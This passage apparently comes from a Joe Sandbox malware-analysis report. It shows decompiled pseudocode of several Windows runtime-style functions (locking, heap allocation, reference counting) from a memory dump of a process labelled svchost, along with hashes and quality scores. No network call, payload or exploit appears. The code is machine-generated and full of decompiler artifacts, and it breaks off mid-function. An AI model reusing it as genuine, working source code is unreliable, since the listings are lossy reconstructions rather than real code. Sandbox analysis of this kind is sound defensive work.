                        • Opcode Fuzzy Hash: 7d5df1bb2d5381f6a90c555eec2111ace50c51815ba1ffcfeab48e66bbf84792
                        • Instruction Fuzzy Hash: 623159726167018FE760CF19C840B2AF7E5FB88B10F49496EB9989B351E771E804CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E03064A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int* _v12;
                        				char _v13;
                        				signed int _v16;
                        				char _v21;
                        				signed int* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t29;
                        				signed int* _t32;
                        				signed int* _t41;
                        				signed int _t42;
                        				void* _t43;
                        				intOrPtr* _t51;
                        				void* _t52;
                        				signed int _t53;
                        				signed int _t58;
                        				void* _t59;
                        				signed int _t60;
                        				signed int _t62;
                        
                        				_t49 = __edx;
                        				_t62 = (_t60 & 0xfffffff8) - 0xc;
                        				_t26 =  *0x311d360 ^ _t62;
                        				_v8 =  *0x311d360 ^ _t62;
                        				_t41 = __ecx;
                        				_t51 = __edx;
                        				_v12 = __ecx;
                        				if(_a4 == 0) {
                        					if(_a8 != 0) {
                        						goto L1;
                        					}
                        					_v13 = 1;
                        					E03042280(_t26, 0x3118608);
                        					_t58 =  *_t41;
                        					if(_t58 == 0) {
                        						L11:
                        						E0303FFB0(_t41, _t51, 0x3118608);
                        						L2:
                        						 *0x311b1e0(_a4, _a8);
                        						_t42 =  *_t51();
                        						if(_t42 == 0) {
                        							_t29 = 0;
                        							L5:
                        							_pop(_t52);
                        							_pop(_t59);
                        							_pop(_t43);
                        							return E0306B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                        						}
                        						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                        						if(_v21 != 0) {
                        							_t53 = 0;
                        							E03042280(_t28, 0x3118608);
                        							_t32 = _v24;
                        							if( *_t32 == _t58) {
                        								 *_t32 = _t42;
                        								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                        								if(_t58 != 0) {
                        									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                        									asm("sbb edi, edi");
                        									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                        								}
                        							}
                        							E0303FFB0(_t42, _t53, 0x3118608);
                        							if(_t53 != 0) {
                        								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						_t29 = _t42;
                        						goto L5;
                        					}
                        					if( *((char*)(_t58 + 0x40)) != 0) {
                        						L10:
                        						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                        						E0303FFB0(_t41, _t51, 0x3118608);
                        						_t29 = _t58;
                        						goto L5;
                        					}
                        					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        						goto L11;
                        					}
                        					goto L10;
                        				}
                        				L1:
                        				_v13 = 0;
                        				_t58 = 0;
                        				goto L2;
                        			}

























                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0eaeba201b0e6a8bfeda1612edb3f70b731f90047d78ca9b257055cae1f5f257
                        • Instruction ID: b58650d0fbc11912b04a972cc2209a193cf36c7527bd8c87dbef37fbc6941d21
                        • Opcode Fuzzy Hash: 0eaeba201b0e6a8bfeda1612edb3f70b731f90047d78ca9b257055cae1f5f257
                        • Instruction Fuzzy Hash: DC31F132607315AFC761EF15CD41BAAF7E8FFC5A11F084969E8664B644CB70D900CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E03068EC7(void* __ecx, void* __edx) {
                        				signed int _v8;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				signed int* _v24;
                        				char* _v28;
                        				signed int* _v32;
                        				intOrPtr _v36;
                        				signed int* _v40;
                        				signed int* _v44;
                        				signed int* _v48;
                        				intOrPtr _v52;
                        				signed int* _v56;
                        				signed int* _v60;
                        				signed int* _v64;
                        				intOrPtr _v68;
                        				signed int* _v72;
                        				char* _v76;
                        				signed int* _v80;
                        				signed int _v84;
                        				signed int* _v88;
                        				intOrPtr _v92;
                        				signed int* _v96;
                        				intOrPtr _v100;
                        				signed int* _v104;
                        				signed int* _v108;
                        				char _v140;
                        				signed int _v144;
                        				signed int _v148;
                        				signed int* _v152;
                        				char _v156;
                        				signed int* _v160;
                        				char _v164;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t67;
                        				intOrPtr _t70;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t73;
                        
                        				_t69 = __edx;
                        				_v8 =  *0x311d360 ^ _t73;
                        				_t48 =  *[fs:0x30];
                        				_t72 = __edx;
                        				_t71 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                        					_t48 = E03054E70(0x31186e4, 0x3069490, 0, 0);
                        					if( *0x31153e8 > 5 && E03068F33(0x31153e8, 0, 0x2000) != 0) {
                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                        						_v108 =  &_v84;
                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                        						_v76 =  &_v156;
                        						_t70 = 8;
                        						_v60 =  &_v144;
                        						_t67 = 4;
                        						_v44 =  &_v148;
                        						_v152 = 0;
                        						_v160 = 0;
                        						_v104 = 0;
                        						_v100 = 2;
                        						_v96 = 0;
                        						_v88 = 0;
                        						_v80 = 0;
                        						_v72 = 0;
                        						_v68 = _t70;
                        						_v64 = 0;
                        						_v56 = 0;
                        						_v52 = 0x31153e8;
                        						_v48 = 0;
                        						_v40 = 0;
                        						_v36 = 0x31153e8;
                        						_v32 = 0;
                        						_v28 =  &_v164;
                        						_v24 = 0;
                        						_v20 = _t70;
                        						_v16 = 0;
                        						_t69 = 0x300bc46;
                        						_t48 = E030A7B9C(0x31153e8, 0x300bc46, _t67, 0x31153e8, _t70,  &_v140);
                        					}
                        				}
                        				return E0306B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                        			}












































                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5374d23366034c65fd0061116c248a1963d5611a856997ad51ac48d28dc4700c
                        • Instruction ID: a8fbd8a0c9d603bc1f767bc42703235c6295dd4cb1b1c684a05c97a899b27d97
                        • Opcode Fuzzy Hash: 5374d23366034c65fd0061116c248a1963d5611a856997ad51ac48d28dc4700c
                        • Instruction Fuzzy Hash: 6A418EB1D112289BDB24CFAAD980AEDFBF8FB48710F5081AEA509A7240D7705A84CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E0305E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                        				intOrPtr* _v0;
                        				signed char _v4;
                        				signed int _v8;
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				signed char _t52;
                        				void* _t54;
                        				intOrPtr* _t56;
                        				void* _t58;
                        				char* _t59;
                        				signed int _t62;
                        
                        				_t58 = __edx;
                        				_push(0);
                        				_push(4);
                        				_push( &_v8);
                        				_push(0x24);
                        				_push(0xffffffff);
                        				if(E03069670() < 0) {
                        					L0307DF30(_t54, _t58, _t35);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(_t54);
                        					_t52 = _v4;
                        					if(_t52 > 8) {
                        						_t37 = 0xc0000078;
                        					} else {
                        						_t38 =  *0x3117b9c; // 0x0
                        						_t62 = _t52 & 0x000000ff;
                        						_t59 = L03044620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                        						if(_t59 == 0) {
                        							_t37 = 0xc0000017;
                        						} else {
                        							_t56 = _v0;
                        							 *(_t59 + 1) = _t52;
                        							 *_t59 = 1;
                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                        							_t44 = _t62 - 1;
                        							if(_t44 <= 7) {
                        								switch( *((intOrPtr*)(_t44 * 4 +  &M0305E810))) {
                        									case 0:
                        										L6:
                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                        										goto L7;
                        									case 1:
                        										L13:
                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                        										goto L6;
                        									case 2:
                        										L12:
                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                        										goto L13;
                        									case 3:
                        										L11:
                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                        										goto L12;
                        									case 4:
                        										L10:
                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                        										goto L11;
                        									case 5:
                        										L9:
                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                        										goto L10;
                        									case 6:
                        										L17:
                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                        										goto L9;
                        									case 7:
                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                        										goto L17;
                        								}
                        							}
                        							L7:
                        							 *_a40 = _t59;
                        							_t37 = 0;
                        						}
                        					}
                        					return _t37;
                        				} else {
                        					_push(0x20);
                        					asm("ror eax, cl");
                        					return _a4 ^ _v8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3531a1dcbaee962938688dd8bd27150d2fd08ec5f33ec61d94610756ac9efdc
                        • Instruction ID: c349079c6909e49692452b9f068c1310c4597459bc8c89fb63c6cc1997137b50
                        • Opcode Fuzzy Hash: a3531a1dcbaee962938688dd8bd27150d2fd08ec5f33ec61d94610756ac9efdc
                        • Instruction Fuzzy Hash: 25318D75A15349AFD744CF68D840B9ABBE8FB08314F1486A6F948CB341D631E980CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E0305BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t22;
                        				intOrPtr* _t41;
                        				intOrPtr _t51;
                        
                        				_t51 =  *0x3116100; // 0x7
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				if(_t51 >= 0x800) {
                        					L12:
                        					return 0;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t22 = _t51;
                        					asm("lock cmpxchg [ecx], edx");
                        					if(_t51 == _t22) {
                        						break;
                        					}
                        					_t51 = _t22;
                        					if(_t22 < 0x800) {
                        						continue;
                        					}
                        					goto L12;
                        				}
                        				E03042280(0xd, 0xf56f1a0);
                        				_t41 =  *0x31160f8; // 0x0
                        				if(_t41 != 0) {
                        					 *0x31160f8 =  *_t41;
                        					 *0x31160fc =  *0x31160fc + 0xffff;
                        				}
                        				E0303FFB0(_t41, 0x800, 0xf56f1a0);
                        				if(_t41 != 0) {
                        					L6:
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                        					do {
                        						asm("lock xadd [0x31160f0], ax");
                        						 *((short*)(_t41 + 0x34)) = 1;
                        					} while (1 == 0);
                        					goto L8;
                        				} else {
                        					_t41 = L03044620(0x3116100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                        					if(_t41 == 0) {
                        						L11:
                        						asm("lock dec dword [0x3116100]");
                        						L8:
                        						return _t41;
                        					}
                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                        					if(_t41 == 0) {
                        						goto L11;
                        					}
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfcce87c4a8686d8242a095d825e4e632a3b1c0588a49e028b806dbe0436d442
                        • Instruction ID: 014b3f792e0ac7fe8e2e53684e93e093121263dd0ee67f15f75fa32c9c48f088
                        • Opcode Fuzzy Hash: dfcce87c4a8686d8242a095d825e4e632a3b1c0588a49e028b806dbe0436d442
                        • Instruction Fuzzy Hash: CE312036A026199FCB51EF58C4807EBB3A8FF48311F0504B9EC44EB205EB75EA45CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E03029100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                        				signed int _t53;
                        				signed int _t56;
                        				signed int* _t60;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t69;
                        				void* _t70;
                        				intOrPtr* _t72;
                        				void* _t78;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				void* _t85;
                        				void* _t88;
                        				void* _t89;
                        
                        				_t84 = __esi;
                        				_t70 = __ecx;
                        				_t68 = __ebx;
                        				_push(0x2c);
                        				_push(0x30ff6e8);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				 *((char*)(_t85 - 0x1d)) = 0;
                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                        				if(_t82 == 0) {
                        					L4:
                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                        						E030F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                        					}
                        					L5:
                        					return E0307D130(_t68, _t82, _t84);
                        				}
                        				_t88 = _t82 -  *0x31186c0; // 0x2801228
                        				if(_t88 == 0) {
                        					goto L4;
                        				}
                        				_t89 = _t82 -  *0x31186b8; // 0x0
                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L4;
                        				} else {
                        					E03042280(_t82 + 0xe0, _t82 + 0xe0);
                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                        					__eflags =  *((char*)(_t82 + 0xe5));
                        					if(__eflags != 0) {
                        						E030F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                        						goto L12;
                        					} else {
                        						__eflags =  *((char*)(_t82 + 0xe4));
                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                        							 *((char*)(_t82 + 0xe4)) = 1;
                        							_push(_t82);
                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                        							E0306AFD0();
                        						}
                        						while(1) {
                        							_t60 = _t82 + 8;
                        							 *(_t85 - 0x2c) = _t60;
                        							_t68 =  *_t60;
                        							_t80 = _t60[1];
                        							 *(_t85 - 0x28) = _t68;
                        							 *(_t85 - 0x24) = _t80;
                        							while(1) {
                        								L10:
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t84 = _t68;
                        								 *(_t85 - 0x30) = _t80;
                        								 *(_t85 - 0x24) = _t80 - 1;
                        								asm("lock cmpxchg8b [edi]");
                        								_t68 = _t84;
                        								 *(_t85 - 0x28) = _t68;
                        								 *(_t85 - 0x24) = _t80;
                        								__eflags = _t68 - _t84;
                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                        								if(_t68 != _t84) {
                        									continue;
                        								}
                        								__eflags = _t80 -  *(_t85 - 0x30);
                        								if(_t80 !=  *(_t85 - 0x30)) {
                        									continue;
                        								}
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t63 = 0;
                        								 *(_t85 - 0x34) = 0;
                        								_t84 = 0;
                        								__eflags = 0;
                        								while(1) {
                        									 *(_t85 - 0x3c) = _t84;
                        									__eflags = _t84 - 3;
                        									if(_t84 >= 3) {
                        										break;
                        									}
                        									__eflags = _t63;
                        									if(_t63 != 0) {
                        										L40:
                        										_t84 =  *_t63;
                        										__eflags = _t84;
                        										if(_t84 != 0) {
                        											_t84 =  *(_t84 + 4);
                        											__eflags = _t84;
                        											if(_t84 != 0) {
                        												 *0x311b1e0(_t63, _t82);
                        												 *_t84();
                        											}
                        										}
                        										do {
                        											_t60 = _t82 + 8;
                        											 *(_t85 - 0x2c) = _t60;
                        											_t68 =  *_t60;
                        											_t80 = _t60[1];
                        											 *(_t85 - 0x28) = _t68;
                        											 *(_t85 - 0x24) = _t80;
                        											goto L10;
                        										} while (_t63 == 0);
                        										goto L40;
                        									}
                        									_t69 = 0;
                        									__eflags = 0;
                        									while(1) {
                        										 *(_t85 - 0x38) = _t69;
                        										__eflags = _t69 -  *0x31184c0;
                        										if(_t69 >=  *0x31184c0) {
                        											break;
                        										}
                        										__eflags = _t63;
                        										if(_t63 != 0) {
                        											break;
                        										}
                        										_t66 = E030F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											_t63 = 0;
                        											__eflags = 0;
                        										} else {
                        											_t63 = _t66 + 0xfffffff4;
                        										}
                        										 *(_t85 - 0x34) = _t63;
                        										_t69 = _t69 + 1;
                        									}
                        									_t84 = _t84 + 1;
                        								}
                        								__eflags = _t63;
                        							}
                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                        							 *((char*)(_t82 + 0xe5)) = 1;
                        							 *((char*)(_t85 - 0x1d)) = 1;
                        							L12:
                        							 *(_t85 - 4) = 0xfffffffe;
                        							E0302922A(_t82);
                        							_t53 = E03047D50();
                        							__eflags = _t53;
                        							if(_t53 != 0) {
                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        							} else {
                        								_t56 = 0x7ffe0386;
                        							}
                        							__eflags =  *_t56;
                        							if( *_t56 != 0) {
                        								_t56 = E030F8B58(_t82);
                        							}
                        							__eflags =  *((char*)(_t85 - 0x1d));
                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                        								__eflags = _t82 -  *0x31186c0; // 0x2801228
                        								if(__eflags != 0) {
                        									__eflags = _t82 -  *0x31186b8; // 0x0
                        									if(__eflags == 0) {
                        										_t79 = 0x31186bc;
                        										_t72 = 0x31186b8;
                        										goto L18;
                        									}
                        									__eflags = _t56 | 0xffffffff;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										E03029240(_t68, _t82, _t82, _t84, __eflags);
                        									}
                        								} else {
                        									_t79 = 0x31186c4;
                        									_t72 = 0x31186c0;
                        									L18:
                        									E03059B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                        								}
                        							}
                        							goto L5;
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e65d5838e4b00ac1f4d3686dc68b5d2f2135887a4132e65905dc651f06be8652
                        • Instruction ID: 0467c82a4c672a4dd615ae277dae3593b7d972054987ab3ff5e367e917936cbc
                        • Opcode Fuzzy Hash: e65d5838e4b00ac1f4d3686dc68b5d2f2135887a4132e65905dc651f06be8652
                        • Instruction Fuzzy Hash: 2531BC79A03399DFDB65EB6DC588BEDBBF1BB88310F188599C4046B241C334A990CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E03051DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr* _v20;
                        				void* _t22;
                        				char _t23;
                        				void* _t36;
                        				intOrPtr _t42;
                        				intOrPtr _t43;
                        
                        				_v12 = __ecx;
                        				_t43 = 0;
                        				_v20 = __edx;
                        				_t42 =  *__edx;
                        				 *__edx = 0;
                        				_v16 = _t42;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(__ecx);
                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                        				_push(_t36);
                        				_t22 = E0304F460();
                        				if(_t22 < 0) {
                        					if(_t22 == 0xc0000023) {
                        						goto L1;
                        					}
                        					L3:
                        					return _t43;
                        				}
                        				L1:
                        				_t23 = _v8;
                        				if(_t23 != 0) {
                        					_t38 = _a4;
                        					if(_t23 >  *_a4) {
                        						_t42 = L03044620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                        						if(_t42 == 0) {
                        							goto L3;
                        						}
                        						_t23 = _v8;
                        					}
                        					_push( &_v8);
                        					_push(_t23);
                        					_push(_t42);
                        					_push(6);
                        					_push(_t43);
                        					_push(_v12);
                        					_push(_t36);
                        					if(E0304F460() < 0) {
                        						if(_t42 != 0 && _t42 != _v16) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                        						}
                        						goto L3;
                        					}
                        					 *_v20 = _t42;
                        					 *_a4 = _v8;
                        				}
                        				_t43 = 1;
                        				goto L3;
                        			}













                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: d196402b5a7655c51e3d951e504c10c142866c9173b52aff5a8e1fff4ea47896
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 6B219F76642219FBDB25CF59CC84FABFBBDEF89640F154065F9019B210D674AE01C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E03040050(void* __ecx) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				signed int _t34;
                        				void* _t40;
                        				void* _t41;
                        				signed int _t44;
                        				intOrPtr _t47;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t61;
                        				void* _t62;
                        				signed int _t64;
                        
                        				_push(__ecx);
                        				_v8 =  *0x311d360 ^ _t64;
                        				_t61 = __ecx;
                        				_t2 = _t61 + 0x20; // 0x20
                        				E03059ED0(_t2, 1, 0);
                        				_t52 =  *(_t61 + 0x8c);
                        				_t4 = _t61 + 0x8c; // 0x8c
                        				_t40 = _t4;
                        				do {
                        					_t44 = _t52;
                        					_t58 = _t52 & 0x00000001;
                        					_t24 = _t44;
                        					asm("lock cmpxchg [ebx], edx");
                        					_t52 = _t44;
                        				} while (_t52 != _t44);
                        				if(_t58 == 0) {
                        					L7:
                        					_pop(_t59);
                        					_pop(_t62);
                        					_pop(_t41);
                        					return E0306B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                        				}
                        				asm("lock xadd [esi], eax");
                        				_t47 =  *[fs:0x18];
                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t30 != 0) {
                        					if( *_t30 == 0) {
                        						goto L4;
                        					}
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					L5:
                        					if( *_t31 != 0) {
                        						_t18 = _t61 + 0x78; // 0x78
                        						E030F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                        					}
                        					_t52 =  *(_t61 + 0x5c);
                        					_t11 = _t61 + 0x78; // 0x78
                        					_t34 = E03059702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                        					_t24 = _t34 | 0xffffffff;
                        					asm("lock xadd [esi], eax");
                        					if((_t34 | 0xffffffff) == 0) {
                        						 *0x311b1e0(_t61);
                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                        					}
                        					goto L7;
                        				}
                        				L4:
                        				_t31 = 0x7ffe0386;
                        				goto L5;
                        			}





















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc3504647dc016341d3be8cb877d22a838f7b3ba2c930cd590f67e06c7a85f9a
                        • Instruction ID: 7d67134329523cc1333f1e881aa8180c76a5d49625ad2d55a853d6b89df65aa9
                        • Opcode Fuzzy Hash: bc3504647dc016341d3be8cb877d22a838f7b3ba2c930cd590f67e06c7a85f9a
                        • Instruction Fuzzy Hash: 1C31BF71202B04CFD765DF28C840B9AF3E5FF88714F18856DE59697B50EB75A901CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E030A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                        				signed short* _v8;
                        				signed char _v12;
                        				void* _t22;
                        				signed char* _t23;
                        				intOrPtr _t24;
                        				signed short* _t44;
                        				void* _t47;
                        				signed char* _t56;
                        				signed char* _t58;
                        
                        				_t48 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t44 = __ecx;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t22 = E03047D50();
                        				_t58 = 0x7ffe0384;
                        				if(_t22 == 0) {
                        					_t23 = 0x7ffe0384;
                        				} else {
                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				}
                        				if( *_t23 != 0) {
                        					_t24 =  *0x3117b9c; // 0x0
                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                        					_t23 = L03044620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                        					_t56 = _t23;
                        					if(_t56 != 0) {
                        						_t56[0x24] = _a4;
                        						_t56[0x28] = _a8;
                        						_t56[6] = 0x1420;
                        						_t56[0x20] = _v12;
                        						_t14 =  &(_t56[0x2c]); // 0x2c
                        						E0306F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
